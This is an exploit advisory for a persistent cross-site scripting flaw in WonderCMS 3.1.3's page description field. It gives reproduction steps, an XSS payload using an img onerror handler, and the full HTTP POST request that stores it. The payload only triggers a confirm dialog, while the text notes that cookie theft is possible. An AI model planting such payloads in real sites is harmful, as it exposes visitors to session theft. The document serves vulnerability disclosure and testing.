Share
## https://sploitus.com/exploit?id=PACKETSTORM:160153
# Exploit Title: WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting  
# Date: 20-11-2020  
# Exploit Author: Hemant Patidar (HemantSolo)  
# Vendor Homepage: https://www.wondercms.com/  
# Version: 3.1.3  
# Tested on: Windows 10/Kali Linux  
  
Stored Cross-site scripting(XSS):  
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.  
  
Attack vector:  
This vulnerability can results attacker to inject the XSS payload in Page description and each time any user will visits the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.  
  
Vulnerable Parameters: Page description.  
  
Steps-To-Reproduce:  
1. Go to the Simple website builder.  
2. Put this payload in Page description: "hemantsolo"><img src=x onerror=confirm(1)>"  
3. Now go to the website and the XSS will be triggered.  
  
POST /demo/ HTTP/1.1  
Host: 127.0.0.1  
Connection: close  
Content-Length: 196  
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36  
DNT: 1  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept: */*  
Origin: 127.0.0.1  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: 127.0.0.1/demo/  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6  
Cookie: PHPSESSID=da4eae35135fd9ce3c413b936e2e5925  
  
fieldname=description&token=c526c8235770f7efe7b7868a806f51f9a48545e117e00534e5cd82fde1bf1064&content=HemantSoloHacker%22%3E%3Cimg%20src%3Dx%20onerror%3Dconfirm(1)%3E&target=pages&menu=&visibility=